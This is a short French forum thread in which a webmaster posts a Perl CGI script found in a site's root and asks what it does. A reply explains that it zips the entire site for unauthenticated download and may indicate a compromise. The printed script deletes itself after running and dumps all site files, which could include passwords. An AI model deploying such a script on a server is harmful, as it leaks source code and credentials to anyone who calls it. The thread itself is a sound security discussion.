Vous n'êtes pas identifié(e).
- Contributions : Récentes | Sans réponse
Pages :: 1
#1 01-05-2010 14:04:31
Besoin d'infos sur script cgi
N'y connaissant rien en perl/cgi, quelqu'un pourrait me dire à quoi pourrait servir un tel script (fichier .cgi) dans la racine d'un site?
Ca ressemble toutefois à un script de backup de site non?
use strict;
unlink $0;
use CGI;
my $cgi=new CGI;
chdir "..";
opendir DIR, "." or die;
print $cgi->header(
-type=>"application/zip",
-content_disposition=>"attachment; filename=backup.zip"
);
my @include=grep {!m/^\./} readdir DIR;
closedir DIR;
exec("zip","-q","-r","-", @include,"-xi", "public_html/$0");
Dernière modification par Jc (01-05-2010 14:07:09)
POO PHP+Ajax en MVC avec PDO et Bases de données épaisses : What else?
Hors ligne
#2 01-05-2010 15:24:30
Re : Besoin d'infos sur script cgi
Bonjour,
En effet, ca y ressemble fortement, ca a l'air de générer un zip en attachement, qui contiendra le contenu du répertoire parent.
Par contre ca me parait super dangereux au niveau sécurité (oui, je fais une fixation, c'est ca de faire service abuse d'une entreprise qui a une certaine taille 
). Il n'y a aucune demande d'identification sur ce script, qui fourni l'intégralité du site en zip. Du coup les sources complètes sont accessible, y compris les mots de passe éventuellement contenus dans certains fichiers 
A voir si c'est volontaire ou un piratage.
@+
la v2, c'est tabou, on en viendra tous a bout
Hors ligne
#3 01-05-2010 16:26:50
Re : Besoin d'infos sur script cgi
Merci Manicow, j'attendais ta réponse^^ (le post etait pour toi 
). Je suis un peu parano aussi question sécurité
Je fais le necessaire. Merci encore.
POO PHP+Ajax en MVC avec PDO et Bases de données épaisses : What else?
Hors ligne
Pages :: 1